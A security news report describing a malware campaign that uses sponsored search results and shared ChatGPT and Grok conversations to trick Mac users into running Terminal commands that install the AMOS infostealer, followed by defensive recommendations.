Cybercriminals have launched a sophisticated attack campaign that takes advantage of user trust in artificial intelligence platforms to spread the Atomic macOS Stealer (AMOS). This represents a significant advancement in social engineering strategies.
AI and Google Ads: A New Threat Vector
This emerging threat cleverly combines legitimate AI chatbot services like ChatGPT and Grok with paid Google advertising. The aim is to trick unsuspecting Mac users into executing harmful terminal commands, thus compromising their systems.
The campaign targets individuals searching for popular troubleshooting solutions, such as freeing up disk space on macOS. It redirects them to seemingly trustworthy AI-generated instructions hosted on credible domains.
The ClickFix Technique
The attack utilizes a method known as “ClickFix,” which deceives users into manually executing shell commands that download and install malware on their devices.
What makes this campaign particularly potent is its ability to bypass traditional security measures. The instructions appear legitimate because they are hosted on official ChatGPT and Grok websites, not suspicious third-party domains.
The Infection Process
The infection chain starts when a Mac user performs a routine Google search for troubleshooting help, like “clear disk space on macOS.” Sponsored ads or top-ranking organic results lead victims to shared ChatGPT or Grok conversations that seem to offer genuine system maintenance advice.
These AI-generated conversations contain meticulously crafted instructions, prompting users to open their Terminal application and paste what appears to be an innocuous command.
The command downloads a script from an external domain controlled by the attackers, repeatedly asking for the user’s system password under the pretense of legitimate system operations. Once the correct credentials are entered, the script installs the AMOS infostealer along with a persistent backdoor that survives system reboots.
Protective Measures and Recommendations
The malware immediately targets cryptocurrency wallets such as Electrum, Exodus, Coinbase, MetaMask, and Ledger Live, extracting seed phrases and private keys for rapid theft of digital assets. It also harvests browser data from Chrome, Safari, and Firefox, including saved passwords and active login sessions.
Both organizations and individual Mac users should monitor for unsigned applications requesting system passwords, unusual Terminal activity, and unexpected network connections to unfamiliar domains.
Security teams must educate users that instructions appearing on trusted AI platforms can be compromised through social engineering. Any guidance that involves Terminal command execution should be independently verified through official support channels before implementation.
